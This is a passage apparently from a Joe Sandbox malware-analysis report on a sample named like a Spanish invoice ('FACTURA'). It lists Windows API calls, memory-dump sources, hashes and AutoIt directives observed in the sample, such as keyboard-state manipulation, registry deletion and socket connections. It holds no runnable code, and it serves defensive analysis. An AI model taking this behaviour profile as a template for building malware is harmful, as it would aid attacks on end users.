                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 00F3104F
                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00F31095
                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00F310B8
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: f37887d4409e05bd1faba481cfa108e9fd26fc352ffb9157b43d0889283ab60a
                                                                            • Instruction ID: b6a4bdfa84d236b97b0385f646ab9d99e1ad6e766d9820b896e2ad8551957260
                                                                            • Opcode Fuzzy Hash: f37887d4409e05bd1faba481cfa108e9fd26fc352ffb9157b43d0889283ab60a
                                                                            • Instruction Fuzzy Hash: D851E5A09047D53DFB3642348C15BBABEA96B06334F08858AE1D5468D3C6D9DCC8F751
                                                                            APIs
                                                                            • GetParent.USER32(00000000), ref: 00F30DA5
                                                                            • GetKeyboardState.USER32(?), ref: 00F30DBA
                                                                            • SetKeyboardState.USER32(?), ref: 00F30E1B
                                                                            • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00F30E47
                                                                            • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00F30E64
                                                                            • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00F30EA8
                                                                            • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00F30EC9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                            • String ID:
                                                                            • API String ID: 87235514-0
                                                                            • Opcode ID: 8500d8b455b45fa0a3f996a0b7f31971ac6325429d56f1f450ec999539bef0c0
                                                                            • Instruction ID: 5247d08dc320b86c4622c7bdd8886b2a635b1fe0f3e3870de238eee9e9158a43
                                                                            • Opcode Fuzzy Hash: 8500d8b455b45fa0a3f996a0b7f31971ac6325429d56f1f450ec999539bef0c0
                                                                            • Instruction Fuzzy Hash: E251D6A0A447D57DFB3683748C65B7A7EA96B06330F08888AE1D4464C2DB95ECD8F750
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: _wcsncpy$LocalTime
                                                                            • String ID:
                                                                            • API String ID: 2945705084-0
                                                                            • Opcode ID: 5606dd58f83386146577aacbf66d28c13cd209456486e2df2e86d18f1ec0f4f0
                                                                            • Instruction ID: 5c8b7f8f4e99025040688845f3f2fa6e8899077c95846e667946ddc3fa45522f
                                                                            • Opcode Fuzzy Hash: 5606dd58f83386146577aacbf66d28c13cd209456486e2df2e86d18f1ec0f4f0
                                                                            • Instruction Fuzzy Hash: 69419265C1161C76CB11EBF4984A9EFB3F8AF44710F509956EB08F3221EB34A345C7AA
                                                                            APIs
                                                                              • Part of subcall function 00F3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F33697,?), ref: 00F3468B
                                                                              • Part of subcall function 00F3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F33697,?), ref: 00F346A4
                                                                            • lstrcmpiW.KERNEL32(?,?), ref: 00F336B7
                                                                            • _wcscmp.LIBCMT ref: 00F336D3
                                                                            • MoveFileW.KERNEL32(?,?), ref: 00F336EB
                                                                            • _wcscat.LIBCMT ref: 00F33733
                                                                            • SHFileOperationW.SHELL32(?), ref: 00F3379F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                            • String ID: \*.*
                                                                            • API String ID: 1377345388-1173974218
                                                                            • Opcode ID: 13dccf47d717feef70fbb5f147d5f6d8b19cb5c456304932fad53535219527e5
                                                                            • Instruction ID: 486b5fddca599cd307dee2125a19a8f9a460f1156c3241d1ab995c93097f4931
                                                                            • Opcode Fuzzy Hash: 13dccf47d717feef70fbb5f147d5f6d8b19cb5c456304932fad53535219527e5
                                                                            • Instruction Fuzzy Hash: D341B471508348AEC751EF64C8469DFB7E8EF883A0F00186EF59AC3251EB34D689D752
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F572AA
                                                                            • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F57351
                                                                            • IsMenu.USER32(?), ref: 00F57369
                                                                            • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00F573B1
                                                                            • DrawMenuBar.USER32 ref: 00F573C4
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$Item$DrawInfoInsert_memset
                                                                            • String ID: 0
                                                                            • API String ID: 3866635326-4108050209
                                                                            • Opcode ID: ac54108469644d1574250a9fd1c465d2f58171ce95b332281568d95b39c393a6
                                                                            • Instruction ID: 1ee7336059c3e6e0310a142e7d6043b66ce06ade13b593bab1a80667d5388d5e
                                                                            • Opcode Fuzzy Hash: ac54108469644d1574250a9fd1c465d2f58171ce95b332281568d95b39c393a6
                                                                            • Instruction Fuzzy Hash: 15411875A04308AFDB20EF50E884A9ABBF8FF05361F149569FE15A7250D730AD58EF50
                                                                            APIs
                                                                            • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00F50FD4
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F50FFE
                                                                            • FreeLibrary.KERNEL32(00000000), ref: 00F510B5
                                                                              • Part of subcall function 00F50FA5: RegCloseKey.ADVAPI32(?), ref: 00F5101B
                                                                              • Part of subcall function 00F50FA5: FreeLibrary.KERNEL32(?), ref: 00F5106D
                                                                              • Part of subcall function 00F50FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00F51090
                                                                            • RegDeleteKeyW.ADVAPI32(?,?), ref: 00F51058
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                            • String ID:
                                                                            • API String ID: 395352322-0
                                                                            • Opcode ID: 52d1ad052f2c01224736867caabe424add3ac4d41fec65dcd3ae7bbf89c37076
                                                                            • Instruction ID: 98ee071ef8ec4f2b9aacf130e2dcd90cca917566a732d43d919057fb4b99051a
                                                                            • Opcode Fuzzy Hash: 52d1ad052f2c01224736867caabe424add3ac4d41fec65dcd3ae7bbf89c37076
                                                                            • Instruction Fuzzy Hash: 9231E171D01109BFDB159F90DC85EFFB7BCEF08311F044169EA15A2191DA74AE89AA60
                                                                            APIs
                                                                            • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 00F562EC
                                                                            • GetWindowLongW.USER32(01142618,000000F0), ref: 00F5631F
                                                                            • GetWindowLongW.USER32(01142618,000000F0), ref: 00F56354
                                                                            • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00F56386
                                                                            • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 00F563B0
                                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00F563C1
                                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00F563DB
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LongWindow$MessageSend
                                                                            • String ID:
                                                                            • API String ID: 2178440468-0
                                                                            • Opcode ID: 5d69312cc440b590e6df9c911eab3f4942c91a08d5b2164a0c4c9abae23162be
                                                                            • Instruction ID: b66c3fddf178f7f9942fe82f41144603ecc0bc823e7063bd720b2db7406f2487
                                                                            • Opcode Fuzzy Hash: 5d69312cc440b590e6df9c911eab3f4942c91a08d5b2164a0c4c9abae23162be
                                                                            • Instruction Fuzzy Hash: 20310231A44254AFEB21CF18DC84F5537E1FB4A766F5901A5FA21CF2B2CB71A848EB50
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2DB2E
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2DB54
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00F2DB57
                                                                            • SysAllocString.OLEAUT32(?), ref: 00F2DB75
                                                                            • SysFreeString.OLEAUT32(?), ref: 00F2DB7E
                                                                            • StringFromGUID2.COMBASE(?,?,00000028), ref: 00F2DBA3
                                                                            • SysAllocString.OLEAUT32(?), ref: 00F2DBB1
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            • Opcode ID: 1d627bf2289a62c1be0a9650af710bdbc05c434247d8e4701d7cd716545ef343
                                                                            • Instruction ID: a2ecd81b445321f0d00a16c0abb3e027f94c90390ba48e78a474673e01843b43
                                                                            • Opcode Fuzzy Hash: 1d627bf2289a62c1be0a9650af710bdbc05c434247d8e4701d7cd716545ef343
                                                                            • Instruction Fuzzy Hash: 4521A132A01229AF9F10DFA8EC98CBB73ACEB48360B018165FE14DB250D770AC45A760
                                                                            APIs
                                                                              • Part of subcall function 00F47D8B: inet_addr.WS2_32(00000000), ref: 00F47DB6
                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 00F461C6
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F461D5
                                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00F4620E
                                                                            • connect.WSOCK32(00000000,?,00000010), ref: 00F46217
                                                                            • WSAGetLastError.WS2_32 ref: 00F46221
                                                                            • closesocket.WS2_32(00000000), ref: 00F4624A
                                                                            • ioctlsocket.WS2_32(00000000,8004667E,00000000), ref: 00F46263
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                            • String ID:
                                                                            • API String ID: 910771015-0
                                                                            • Opcode ID: f1d71fa9cefbb146e9cf347d144fef5de70a23f85184f6b7a7addef3026157fe
                                                                            • Instruction ID: f96622487f24c48d7d495a5fe31156605814c3d2c7595170c004ba5b2a92468d
                                                                            • Opcode Fuzzy Hash: f1d71fa9cefbb146e9cf347d144fef5de70a23f85184f6b7a7addef3026157fe
                                                                            • Instruction Fuzzy Hash: F331B531600218AFDF10AF24CC85BBD7BACEF45721F044069FD05E7291DB74AD04AB62
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: __wcsnicmp
                                                                            • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                            • API String ID: 1038674560-2734436370
                                                                            APIs
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2DC09
                                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00F2DC2F
                                                                            • SysAllocString.OLEAUT32(00000000), ref: 00F2DC32
                                                                            • SysAllocString.OLEAUT32 ref: 00F2DC53
                                                                            • SysFreeString.OLEAUT32 ref: 00F2DC5C
                                                                            • StringFromGUID2.COMBASE(?,?,00000028), ref: 00F2DC76
                                                                            • SysAllocString.OLEAUT32(?), ref: 00F2DC84
                                                                            Similarity
                                                                            • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                            • String ID:
                                                                            • API String ID: 3761583154-0
                                                                            APIs
                                                                              • Part of subcall function 00ED1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00ED1D73
                                                                              • Part of subcall function 00ED1D35: GetStockObject.GDI32(00000011), ref: 00ED1D87
                                                                              • Part of subcall function 00ED1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00ED1D91
                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00F57632
                                                                            • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 00F5763F
                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00F5764A
                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00F57659
                                                                            • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00F57665
                                                                            Similarity
                                                                            • API ID: MessageSend$CreateObjectStockWindow
                                                                            • String ID: Msctls_Progress32
                                                                            • API String ID: 1025951953-3636473452
                                                                            APIs
                                                                            • __init_pointers.LIBCMT ref: 00EF9AE6
                                                                              • Part of subcall function 00EF3187: RtlEncodePointer.NTDLL(00000000), ref: 00EF318A
                                                                              • Part of subcall function 00EF3187: __initp_misc_winsig.LIBCMT ref: 00EF31A5
                                                                              • Part of subcall function 00EF3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00EF9EA0
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00EF9EB4
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00EF9EC7
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00EF9EDA
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00EF9EED
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00EF9F00
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00EF9F13
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00EF9F26
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00EF9F39
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00EF9F4C
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00EF9F5F
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00EF9F72
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00EF9F85
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00EF9F98
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00EF9FAB
                                                                              • Part of subcall function 00EF3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00EF9FBE
                                                                            • __mtinitlocks.LIBCMT ref: 00EF9AEB
                                                                            • __mtterm.LIBCMT ref: 00EF9AF4
                                                                              • Part of subcall function 00EF9B5C: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00EF9C56
                                                                              • Part of subcall function 00EF9B5C: _free.LIBCMT ref: 00EF9C5D
                                                                              • Part of subcall function 00EF9B5C: RtlDeleteCriticalSection.NTDLL(00F8EC00), ref: 00EF9C7F
                                                                            • __calloc_crt.LIBCMT ref: 00EF9B19
                                                                            • __initptd.LIBCMT ref: 00EF9B3B
                                                                            • GetCurrentThreadId.KERNEL32 ref: 00EF9B42
                                                                            Similarity
                                                                            • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                            • String ID:
                                                                            • API String ID: 3567560977-0
                                                                            APIs
                                                                            • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EF3F85), ref: 00EF4085
                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00EF408C
                                                                            • RtlEncodePointer.NTDLL(00000000), ref: 00EF4097
                                                                            • RtlDecodePointer.NTDLL(00EF3F85), ref: 00EF40B2
                                                                            Similarity
                                                                            • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                            • String ID: RoUninitialize$combase.dll
                                                                            • API String ID: 3489934621-2819208100
                                                                            APIs
                                                                            • __WSAFDIsSet.WS2_32(00000000,?), ref: 00F46C00
                                                                            • WSAGetLastError.WS2_32(00000000), ref: 00F46C34
                                                                            • htons.WS2_32(?), ref: 00F46CEA
                                                                            • inet_ntoa.WS2_32(?), ref: 00F46CA7
                                                                              • Part of subcall function 00F2A7E9: _strlen.LIBCMT ref: 00F2A7F3
                                                                              • Part of subcall function 00F2A7E9: _memmove.LIBCMT ref: 00F2A815
                                                                            • _strlen.LIBCMT ref: 00F46D44
                                                                            • _memmove.LIBCMT ref: 00F46DAD
                                                                            Similarity
                                                                            • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                            • String ID:
                                                                            • API String ID: 3619996494-0
                                                                            APIs
                                                                            Similarity
                                                                            • API ID: _memmove$__itow__swprintf
                                                                            • String ID:
                                                                            • API String ID: 3253778849-0
                                                                            APIs
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                              • Part of subcall function 00F50E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4FDAD,?,?), ref: 00F50E31
                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00F502BD
                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00F502FD
                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00F50320
                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00F50349
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F5038C
                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00F50399
                                                                            Similarity
                                                                            • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                            • String ID:
                                                                            • API String ID: 4046560759-0
APIs
• GetMenu.USER32(?), ref: 00F557FB
• GetMenuItemCount.USER32(00000000), ref: 00F55832
• GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00F5585A
• GetMenuItemID.USER32(?,?), ref: 00F558C9
• GetSubMenu.USER32(?,?), ref: 00F558D7
• PostMessageW.USER32(?,00000111,?,00000000), ref: 00F55928
Memory Dump Source
• Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
• Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
Similarity
• API ID: Menu$Item$CountMessagePostString
• String ID:
• API String ID: 650687236-0
APIs
• VariantInit.OLEAUT32(?), ref: 00F2EF06
• VariantClear.OLEAUT32(00000013), ref: 00F2EF78
• VariantClear.OLEAUT32(00000000), ref: 00F2EFD3
• _memmove.LIBCMT ref: 00F2EFFD
